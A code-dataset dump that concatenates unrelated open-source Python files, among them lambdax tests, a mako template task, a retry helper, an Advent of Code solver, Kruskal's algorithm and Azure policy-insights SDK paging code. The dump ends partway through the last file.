google.load("visualization", "1", {packages:["treemap"]});
google.setOnLoadCallback(drawChart);
function drawChart() {
// Create and populate the data table.
var data = google.visualization.arrayToDataTable(%s);
// Create and draw the visualization.
var tree = new google.visualization.TreeMap(document.getElementById('chart_div'));
tree.draw(data, { headerHeight: 15, fontColor: 'black' });
}
</script>
</head>
<body>
<div id="chart_div" style="width: 900px; height: 500px;"></div>
<p style="text-align: center">Click to descend. Right-click to ascend.</p>
</body>
</html>
''' % json_usage(args[0])
# ''' % du2json(get_usage(args[0]))
print html
if __name__ == "__main__":
main(sys.argv[1:] or ['.'])
| geekoftheweek/disk-treemap | treemap.py | Python | mit | 2,734 |
""" Check what the `lambdax` module publicly exposes. """
import builtins
from inspect import isbuiltin, ismodule, isclass
from itertools import chain
import operator
from unittest.mock import patch
import lambdax.builtins_as_lambdas
import lambdax.builtins_overridden
from lambdax import x1, x2, x
def _get_exposed(tested_module):
return {name for name, obj in vars(tested_module).items()
if not name.startswith('_') and not ismodule(obj)}
def test_no_builtin_exposed():
for obj in chain(vars(lambdax).values(), vars(lambdax.builtins_overridden).values()):
assert not isbuiltin(obj)
def test_base_exposed():
variables = {'x'} | {'x%d' % i for i in range(1, 10)}
variables |= {v.upper() for v in variables}
special_functions = {'λ', 'is_λ', 'comp', 'circle', 'chaining', 'and_', 'or_', 'if_'}
to_expose = variables | special_functions
exposed = _get_exposed(lambdax.lambda_calculus)
assert to_expose == exposed
def test_operators_exposed():
operators = {name for name, obj in vars(operator).items()
if not name.startswith('_') and not isclass(obj) and not hasattr(builtins, name)}
to_expose = operators.difference(('and_', 'or_', 'xor'))
assert to_expose == _get_exposed(lambdax.operators)
def test_overridden_builtins_exposed():
builtin_names = {name for name, obj in vars(builtins).items()
if name[0].upper() != name[0]}
irrelevant_builtins = {
'input', 'help', 'open',
'copyright', 'license', 'credits',
'compile', 'eval', 'exec', 'execfile', 'runfile',
'classmethod', 'staticmethod', 'property',
'object', 'super',
'globals', 'locals'
}
builtins_to_expose = builtin_names - irrelevant_builtins
to_expose_as_λ = {name + '_λ' for name in builtins_to_expose}
split_exposed_names = (name.split('_') for name in _get_exposed(lambdax.builtins_as_lambdas))
exposed_as_λ = {'%s_%s' % (words[0], words[-1]) for words in split_exposed_names}
assert to_expose_as_λ == exposed_as_λ
assert builtins_to_expose == _get_exposed(lambdax.builtins_overridden)
def test_operators_implementations():
operators = vars(operator)
for name, abstraction in vars(lambdax.operators).items():
initial = operators.get(name)
if initial and isbuiltin(initial):
wrapped = getattr(abstraction, '_λ_constant')
assert wrapped == initial
try:
ref = initial(42, 51)
except TypeError as e:
ref = e.args
try:
res = abstraction(x1, x2)(42, 51)
except TypeError as e:
res = e.args
assert res == ref
def _get_effect(implementation):
output = []
with patch('sys.stdout') as out:
out.side_effect = output.append
try:
res = implementation("42")
except BaseException as e:
res = e.args
return res, output
def _get_method_or_object(obj, meth=''):
return getattr(obj, meth) if meth else obj
def test_overridden_builtins_implementations():
for name in _get_exposed(lambdax.builtins_as_lambdas):
obj, tail = name.split('_', 1)
meth = tail[:-2]
original = _get_method_or_object(getattr(builtins, obj), meth)
as_λ = getattr(lambdax.builtins_as_lambdas, name)
overridden = _get_method_or_object(getattr(lambdax.builtins_overridden, obj), meth)
ref, ref_output = _get_effect(original)
expl, expl_output = _get_effect(as_λ(x))
iso, iso_output = _get_effect(overridden)
lbda, lbda_output = _get_effect(overridden(x))
assert lbda_output == iso_output == expl_output == ref_output
try:
assert list(iter(lbda)) == list(iter(iso)) == list(iter(expl)) == list(iter(ref))
except TypeError:
assert lbda == iso == expl == ref
| hlerebours/lambda-calculus | lambdax/test/test_exposed.py | Python | mit | 3,947 |
__author__ = 'ysahn'
import logging
import json
import os
import glob
import collections
from mako.lookup import TemplateLookup
from mako.template import Template
from taskmator.task.core import Task
class TransformTask(Task):
"""
Class that transform a json into code using a template
Uses mako as template engine for transformation
"""
logger = logging.getLogger(__name__)
ATTR_TEMPLATE_DIR = u'template_dir'
ATTR_TEMPLATES = u'templates'
ATTR_SRC_DIR = u'src_dir'
ATTR_SRC_FILES = u'src_files'
ATTR_DEST_DIR = u'dest_dir'
ATTR_FILE_PREFIX = u'file_prefix'
ATTR_FILE_EXT = u'file_ext'
__VALID_ATTRS = [ATTR_TEMPLATE_DIR, ATTR_TEMPLATES, ATTR_SRC_DIR, ATTR_SRC_FILES,
ATTR_DEST_DIR, ATTR_FILE_PREFIX, ATTR_FILE_EXT]
def __init__(self, name, parent=None):
"""
Constructor
"""
super(TransformTask, self).__init__(name, parent)
self.template_dir = None
self.templates = collections.OrderedDict()
def setAttribute(self, attrKey, attrVal):
if (attrKey in self.__VALID_ATTRS):
self.attribs[attrKey] = attrVal
else:
super(TransformTask, self).setAttribute(attrKey, attrVal)
def init(self):
super(TransformTask, self).init()
template_dir = self._normalize_dir(self.getAttribute(self.ATTR_TEMPLATE_DIR, './'), './')
template_names = self.getAttribute(self.ATTR_TEMPLATES)
if not template_names:
raise ("Attribute '" + self.ATTR_TEMPLATES + "' is required")
if (isinstance(template_names, basestring)):
template_names = [template_names]
tpl_lookup = TemplateLookup(directories=[template_dir])
for template_name in template_names:
template_paths = glob.glob(template_dir + template_name + '.tpl')
for template_path in template_paths:
atemplate = Template(filename=template_path, lookup=tpl_lookup)
self.templates[template_path] = atemplate
def executeInternal(self, execution_context):
"""
@type execution_context: ExecutionContext
"""
self.logger.info("Executing " + str(self))
src_dir = self._normalize_dir(self.getAttribute(self.ATTR_SRC_DIR, './'), './')
file_patterns = self.getAttribute(self.ATTR_SRC_FILES, '*.json')
file_patterns = file_patterns if file_patterns else '*.json'
# Convert to an array
if (isinstance(file_patterns, basestring)):
file_patterns = [file_patterns]
outputs = {}
for file_pattern in file_patterns:
file_paths = glob.glob(src_dir + file_pattern)
for file_path in file_paths:
model = self._load_model(file_path)
fname = self._get_filaname(file_path, False)
for tpl_path, tpl in self.templates.iteritems():
tpl_name = self._get_filaname(tpl_path, False)
outputs[fname + '.' + tpl_name] = self._transform(tpl, model, self.getParams())
# write to a file
dest_dir = self._normalize_dir(self.getAttribute(self.ATTR_DEST_DIR, './'), './')
file_ext = '.' + self.getAttribute(self.ATTR_FILE_EXT)
for name, output in outputs.iteritems():
self._write(output, dest_dir + name + file_ext)
return (Task.CODE_OK, outputs)
# Private methods
def _normalize_dir(self, dir, default):
dir = dir if dir else default
dir = dir if dir.startswith('/') else os.getcwd() + '/' + dir
return dir if dir.endswith('/') else dir + '/'
def _load_model(self, model_uri):
file = open(model_uri, "r")
file_content = file.read()
model = json.loads(file_content, object_pairs_hook=collections.OrderedDict)
return model
def _transform(self, thetemplate, model, params):
return thetemplate.render_unicode(model=model, params=params)
def _get_filaname(self, file_path, include_ext = True):
"""
Returns the filename
@param file_path: string The path
@param include_ext: boolean Whether or not to include extension
@return: string
"""
retval = file_path
last_sep_pos = file_path.rfind('/')
if (last_sep_pos > -1):
retval = file_path[last_sep_pos+1:]
if (not include_ext):
last_dot_pos = retval.rfind('.')
if (last_dot_pos > -1):
retval = retval[:last_dot_pos]
return retval
def _write(self, data, dest_path):
self._normalize_dir(dest_path, './')
with open(dest_path, "w") as text_file:
text_file.write(data)
| altenia/taskmator | taskmator/task/text.py | Python | mit | 4,755 |
import sys
import traceback
import logging
import time
import inspect
def run_resilient(function, function_args=[], function_kwargs={}, tolerated_errors=(Exception,), log_prefix='Something failed, tolerating error and retrying: ', retries=5, delay=True, critical=False, initial_delay_time=0.1, delay_multiplier = 2.0):
"""Run the function with function_args and function_kwargs. Warn if it excepts, and retry. If retries are exhausted,
log that, and if it's critical, properly throw the exception """
def show_exception_info(log_prefix):
"""Warn about an exception with a lower priority message, with a text prefix and the error type"""
exc_type, exc_value, exc_traceback = sys.exc_info()
lines = traceback.format_exception(exc_type, exc_value, exc_traceback)
traceback_text = lines[2]
logging.info(log_prefix + traceback_text)
return
delay_time = initial_delay_time
while retries:
retries -= 1
try:
return function(*function_args, **function_kwargs)
except tolerated_errors, error: #IGNORE:W0703
# One of our anticipated errors happened.
if retries:
# We've got more retries left. Log the error, and continue.
show_exception_info(log_prefix)
if delay:
time.sleep(delay_time)
delay_time = delay_time * delay_multiplier
else:
delay_time = 0
logging.info('We have %d tries left. Delaying for %.2f seconds and trying again.', retries, delay_time)
else:
logging.warn('Could not complete action after %d retries.', retries)
if critical:
logging.error('Critical action failed.')
raise error
except Exception:
# We've recieved an error we didn't anticipate. This is bad.
# Depending on the error we the developers should either fix something, or, if we want to tolerate it,
# add it to our tolerated_errors.
# Those things require human judgement, so we'll raise the exception.
logging.exception('Unanticipated error recieved!') #Log the exception
raise #Re-raise
except:
typ, value, unused = sys.exc_info()
# We've received an exception that isn't even an Exception subclass!
# This is bad manners - see http://docs.python.org/tutorial/errors.html:
# "Exceptions should typically be derived from the Exception class, either directly or indirectly."
logging.exception("Bad mannered exception. Class was: %s Value was: %s Source file: %s", typ.__name__, str(value), inspect.getsourcefile(typ))
raise
| mikemaccana/resilience | __init__.py | Python | mit | 2,874 |
#!/usr/bin/env python
"""
Solve day 23 of Advent of Code.
http://adventofcode.com/day/23
"""
class Computer:
def __init__(self):
"""
Our computer has 2 registers, a and b,
and an instruction pointer so that we know
which instruction to fetch next.
"""
self.a = 0
self.b = 0
self.ip = 0 # Ye olde instruction pointer
def run_program(self, program):
"""
Run a list of program instructions until we
try to move the instruction pointer beyond
the bounds of the instruction list.
"""
while True:
try:
instruction, args = self.parse_instruction(program[self.ip])
except IndexError:
return
getattr(self, instruction)(*args)
def parse_instruction(self, line):
"""
Parse a line of the program into
the instruction and its arguments.
"""
instruction, *args = line.strip().replace(',', '').split()
return instruction, args
def hlf(self, register):
"""
Set the register to half its current value,
then increment the instruction pointer.
"""
setattr(self, register, getattr(self, register)//2)
self.ip += 1
def tpl(self, register):
"""
Set the register to triple its current value,
then increment the instruction pointer.
"""
setattr(self, register, getattr(self, register)*3)
self.ip += 1
def inc(self, register):
"""
Increment the value in the register,
then increment the instruction pointer.
"""
setattr(self, register, getattr(self, register) + 1)
self.ip += 1
def jmp(self, offset):
"""
Jump the instruction pointer by a particular offset.
"""
self.ip += int(offset)
def jie(self, register, offset):
"""
Jump the instruction pointer by an offset
if the value in the register is even.
"""
if getattr(self, register) % 2 == 0:
self.jmp(offset)
else:
self.ip += 1
def jio(self, register, offset):
"""
Jump the instruction pointer by an offset
if the value in the register is one.
"""
if getattr(self, register) == 1:
self.jmp(offset)
else:
self.ip += 1
if __name__ == '__main__':
with open('input.txt') as f:
program = f.readlines()
computer = Computer()
# Part 1 - start with a=0, b=0
computer.run_program(program)
print("Part 1:", computer.b)
# Part 2 - now start with a=1, b=0
computer = Computer()
computer.a = 1
computer.run_program(program)
print("Part 2:", computer.b)
| mpirnat/adventofcode | day23/day23.py | Python | mit | 2,854 |
import subprocess
import os
import errno
def download_file(url, local_fname=None, force_write=False):
# requests is not default installed
import requests
if local_fname is None:
local_fname = url.split('/')[-1]
if not force_write and os.path.exists(local_fname):
return local_fname
dir_name = os.path.dirname(local_fname)
if dir_name != "":
if not os.path.exists(dir_name):
try: # try to create the directory if it doesn't exists
os.makedirs(dir_name)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
r = requests.get(url, stream=True)
assert r.status_code == 200, "failed to open %s" % url
with open(local_fname, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
return local_fname
def get_gpus():
"""
return a list of GPUs
"""
try:
re = subprocess.check_output(["nvidia-smi", "-L"], universal_newlines=True)
except OSError:
return []
return range(len([i for i in re.split('\n') if 'GPU' in i]))
| yancz1989/lr_semi | common/util.py | Python | mit | 1,092 |
import unittest
from locust.util.timespan import parse_timespan
from locust.util.rounding import proper_round
class TestParseTimespan(unittest.TestCase):
def test_parse_timespan_invalid_values(self):
self.assertRaises(ValueError, parse_timespan, None)
self.assertRaises(ValueError, parse_timespan, "")
self.assertRaises(ValueError, parse_timespan, "q")
def test_parse_timespan(self):
self.assertEqual(7, parse_timespan("7"))
self.assertEqual(7, parse_timespan("7s"))
self.assertEqual(60, parse_timespan("1m"))
self.assertEqual(7200, parse_timespan("2h"))
self.assertEqual(3787, parse_timespan("1h3m7s"))
class TestRounding(unittest.TestCase):
def test_rounding_down(self):
self.assertEqual(1, proper_round(1.499999999))
self.assertEqual(5, proper_round(5.499999999))
self.assertEqual(2, proper_round(2.05))
self.assertEqual(3, proper_round(3.05))
def test_rounding_up(self):
self.assertEqual(2, proper_round(1.5))
self.assertEqual(3, proper_round(2.5))
self.assertEqual(4, proper_round(3.5))
self.assertEqual(5, proper_round(4.5))
self.assertEqual(6, proper_round(5.5))
| heyman/locust | locust/test/test_util.py | Python | mit | 1,232 |
# This module is free software. You can redistribute it and/or modify it under
# the terms of the MIT License, see the file COPYING included with this
# distribution.
from __future__ import division
"""
main.py -- main program of motif sequence coverage pipeline tool
example for running code: python main.py -jid test -confFile ./data/default_scan_only.conf
This will create a results folder with the name test. You will need to delete the folder if you want to run the code again with the same name
"""
#python imports
import sys
import os
import argparse
import shutil
#add the util folder path to use util files in it
inPath = os.path.realpath(__file__)
split = inPath.split('/')
inPath = '/'.join(split[:len(split)-1])
sys.path.append(inPath + '/utils')
import conf
import general_utils
import Fimo
import Tomtom
#add the alg folder path to call the different algorithms
sys.path.append(inPath + '/algo')
import greedy
import motif_pwm_scan_cov
import motif_pwm_scan_only
#MAIN
def main(args):
#example for running code: python main.py -jid test -confFile ./data/default_scan_only.conf
print "main.py::main()"
parser = argparse.ArgumentParser()
parser.add_argument("-jid", "--jid", help="enter job ID") #job id to make a folder to store all the data for a specific job
parser.add_argument("-confFile", "--confFile", help="enter the configuration file")#path to configuration file
args = parser.parse_args()
print 'jobId:', args.jid,'configfile:', args.confFile
#make a results directory to store job results
resultsDirName = args.jid
os.makedirs(resultsDirName)
#make a file list to store all the files to be moved to the results folder
fileList = []
#copy the config file
cpConfFileName = args.jid + '_in_conf_file'
cpConfFile = open(cpConfFileName, 'wb')
with open(args.confFile, 'rb') as handler:
for line in handler:
cpConfFile.write(line)
cpConfFile.close()
fileList.append(cpConfFileName)
#make a config object
confObj = conf.Conf()
confDict = confObj.read(args.confFile)
############
#Have a PWM file and want to scan it across a fasta file and then apply sequence coverage
############
if confDict['job.type']['type'] == 'motifPwmScanCov':
print 'motif_pwm scanning and coverage operation'
motif_pwm_scan_cov.callMotifPwmScanCov(args, confDict, fileList)
#move files to results folder
for outFile in fileList:
shutil.move(outFile, resultsDirName)
exit()
############
#Have a PWM file and want to scan it across a file only
############
if confDict['job.type']['type'] == 'pwmScan':
print 'motif pwm scanning only'
motif_pwm_scan_only.callMotifPwmScanOnly(args, confDict, fileList)
#move files to results folder
for outFile in fileList:
shutil.move(outFile, resultsDirName)
exit()
###############
#EXIT
###############
exit()
#calling main
if( __name__ == "__main__" ):
main(sys.argv)
| RamiOran/SeqCov | main.py | Python | mit | 3,137 |
from __future__ import annotations
from typing import Generic, TypeVar
T = TypeVar("T")
class DisjointSetTreeNode(Generic[T]):
# Disjoint Set Node to store the parent and rank
def __init__(self, data: T) -> None:
self.data = data
self.parent = self
self.rank = 0
class DisjointSetTree(Generic[T]):
# Disjoint Set DataStructure
def __init__(self) -> None:
# map from node name to the node object
self.map: dict[T, DisjointSetTreeNode[T]] = {}
def make_set(self, data: T) -> None:
# create a new set with x as its member
self.map[data] = DisjointSetTreeNode(data)
def find_set(self, data: T) -> DisjointSetTreeNode[T]:
# find the set x belongs to (with path-compression)
elem_ref = self.map[data]
if elem_ref != elem_ref.parent:
elem_ref.parent = self.find_set(elem_ref.parent.data)
return elem_ref.parent
def link(
self, node1: DisjointSetTreeNode[T], node2: DisjointSetTreeNode[T]
) -> None:
# helper function for union operation
if node1.rank > node2.rank:
node2.parent = node1
else:
node1.parent = node2
if node1.rank == node2.rank:
node2.rank += 1
def union(self, data1: T, data2: T) -> None:
# merge 2 disjoint sets
self.link(self.find_set(data1), self.find_set(data2))
class GraphUndirectedWeighted(Generic[T]):
def __init__(self) -> None:
# connections: map from the node to the neighbouring nodes (with weights)
self.connections: dict[T, dict[T, int]] = {}
def add_node(self, node: T) -> None:
# add a node ONLY if its not present in the graph
if node not in self.connections:
self.connections[node] = {}
def add_edge(self, node1: T, node2: T, weight: int) -> None:
# add an edge with the given weight
self.add_node(node1)
self.add_node(node2)
self.connections[node1][node2] = weight
self.connections[node2][node1] = weight
def kruskal(self) -> GraphUndirectedWeighted[T]:
# Kruskal's Algorithm to generate a Minimum Spanning Tree (MST) of a graph
"""
Details: https://en.wikipedia.org/wiki/Kruskal%27s_algorithm
Example:
>>> g1 = GraphUndirectedWeighted[int]()
>>> g1.add_edge(1, 2, 1)
>>> g1.add_edge(2, 3, 2)
>>> g1.add_edge(3, 4, 1)
>>> g1.add_edge(3, 5, 100) # Removed in MST
>>> g1.add_edge(4, 5, 5)
>>> assert 5 in g1.connections[3]
>>> mst = g1.kruskal()
>>> assert 5 not in mst.connections[3]
>>> g2 = GraphUndirectedWeighted[str]()
>>> g2.add_edge('A', 'B', 1)
>>> g2.add_edge('B', 'C', 2)
>>> g2.add_edge('C', 'D', 1)
>>> g2.add_edge('C', 'E', 100) # Removed in MST
>>> g2.add_edge('D', 'E', 5)
>>> assert 'E' in g2.connections["C"]
>>> mst = g2.kruskal()
>>> assert 'E' not in mst.connections['C']
"""
# getting the edges in ascending order of weights
edges = []
seen = set()
for start in self.connections:
for end in self.connections[start]:
if (start, end) not in seen:
seen.add((end, start))
edges.append((start, end, self.connections[start][end]))
edges.sort(key=lambda x: x[2])
# creating the disjoint set
disjoint_set = DisjointSetTree[T]()
for node in self.connections:
disjoint_set.make_set(node)
# MST generation
num_edges = 0
index = 0
graph = GraphUndirectedWeighted[T]()
while num_edges < len(self.connections) - 1:
u, v, w = edges[index]
index += 1
parent_u = disjoint_set.find_set(u)
parent_v = disjoint_set.find_set(v)
if parent_u != parent_v:
num_edges += 1
graph.add_edge(u, v, w)
disjoint_set.union(u, v)
return graph
| TheAlgorithms/Python | graphs/minimum_spanning_tree_kruskal2.py | Python | mit | 4,095 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PolicyTrackedResourcesOperations:
"""PolicyTrackedResourcesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.policyinsights.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_query_results_for_management_group(
self,
management_group_name: str,
query_options: Optional["_models.QueryOptions"] = None,
**kwargs: Any
) -> AsyncIterable["_models.PolicyTrackedResourcesQueryResults"]:
"""Queries policy tracked resources under the management group.
:param management_group_name: Management group name.
:type management_group_name: str
:param query_options: Parameter group.
:type query_options: ~azure.mgmt.policyinsights.models.QueryOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PolicyTrackedResourcesQueryResults or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.policyinsights.models.PolicyTrackedResourcesQueryResults]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyTrackedResourcesQueryResults"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_top = None
_filter = None
if query_options is not None:
_top = query_options.top
_filter = query_options.filter
management_groups_namespace = "Microsoft.Management"
policy_tracked_resources_resource = "default"
api_version = "2018-07-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_query_results_for_management_group.metadata['url'] # type: ignore
path_format_arguments = {
'managementGroupsNamespace': self._serialize.url("management_groups_namespace", management_groups_namespace, 'str'),
'managementGroupName': self._serialize.url("management_group_name", management_group_name, 'str'),
'policyTrackedResourcesResource': self._serialize.url("policy_tracked_resources_resource", policy_tracked_resources_resource, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if _top is not None:
query_parameters['$top'] = self._serialize.query("top", _top, 'int', minimum=0)
if _filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", _filter, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.post(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PolicyTrackedResourcesQueryResults', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.QueryFailure, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_query_results_for_management_group.metadata = {'url': '/providers/{managementGroupsNamespace}/managementGroups/{managementGroupName}/providers/Microsoft.PolicyInsights/policyTrackedResources/{policyTrackedResourcesResource}/queryResults'} # type: ignore
def list_query_results_for_subscription(
self,
query_options: Optional["_models.QueryOptions"] = None,
**kwargs: Any
) -> AsyncIterable["_models.PolicyTrackedResourcesQueryResults"]:
"""Queries policy tracked resources under the subscription.
:param query_options: Parameter group.
:type query_options: ~azure.mgmt.policyinsights.models.QueryOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PolicyTrackedResourcesQueryResults or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.policyinsights.models.PolicyTrackedResourcesQueryResults]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyTrackedResourcesQueryResults"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_top = None
_filter = None
if query_options is not None:
_top = query_options.top
_filter = query_options.filter
policy_tracked_resources_resource = "default"
api_version = "2018-07-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_query_results_for_subscription.metadata['url'] # type: ignore
path_format_arguments = {
'policyTrackedResourcesResource': self._serialize.url("policy_tracked_resources_resource", policy_tracked_resources_resource, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if _top is not None:
query_parameters['$top'] = self._serialize.query("top", _top, 'int', minimum=0)
if _filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", _filter, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.post(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PolicyTrackedResourcesQueryResults', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.QueryFailure, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_query_results_for_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.PolicyInsights/policyTrackedResources/{policyTrackedResourcesResource}/queryResults'} # type: ignore
def list_query_results_for_resource_group(
self,
resource_group_name: str,
query_options: Optional["_models.QueryOptions"] = None,
**kwargs: Any
) -> AsyncIterable["_models.PolicyTrackedResourcesQueryResults"]:
"""Queries policy tracked resources under the resource group.
:param resource_group_name: Resource group name.
:type resource_group_name: str
:param query_options: Parameter group.
:type query_options: ~azure.mgmt.policyinsights.models.QueryOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PolicyTrackedResourcesQueryResults or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.policyinsights.models.PolicyTrackedResourcesQueryResults]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyTrackedResourcesQueryResults"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_top = None
_filter = None
if query_options is not None:
_top = query_options.top
_filter = query_options.filter
policy_tracked_resources_resource = "default"
api_version = "2018-07-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_query_results_for_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyTrackedResourcesResource': self._serialize.url("policy_tracked_resources_resource", policy_tracked_resources_resource, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if _top is not None:
query_parameters['$top'] = self._serialize.query("top", _top, 'int', minimum=0)
if _filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", _filter, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.post(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PolicyTrackedResourcesQueryResults', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.QueryFailure, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_query_results_for_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.PolicyInsights/policyTrackedResources/{policyTrackedResourcesResource}/queryResults'} # type: ignore
def list_query_results_for_resource(
self,
resource_id: str,
query_options: Optional["_models.QueryOptions"] = None,
**kwargs: Any
) -> AsyncIterable["_models.PolicyTrackedResourcesQueryResults"]:
"""Queries policy tracked resources under the resource.
:param resource_id: Resource ID.
:type resource_id: str
:param query_options: Parameter group.
:type query_options: ~azure.mgmt.policyinsights.models.QueryOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PolicyTrackedResourcesQueryResults or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.policyinsights.models.PolicyTrackedResourcesQueryResults]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyTrackedResourcesQueryResults"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_top = None
_filter = None
if query_options is not None:
_top = query_options.top
_filter = query_options.filter
policy_tracked_resources_resource = "default"
api_version = "2018-07-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_query_results_for_resource.metadata['url'] # type: ignore
path_format_arguments = {
'resourceId': self._serialize.url("resource_id", resource_id, 'str', skip_quote=True),
'policyTrackedResourcesResource': self._serialize.url("policy_tracked_resources_resource", policy_tracked_resources_resource, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if _top is not None:
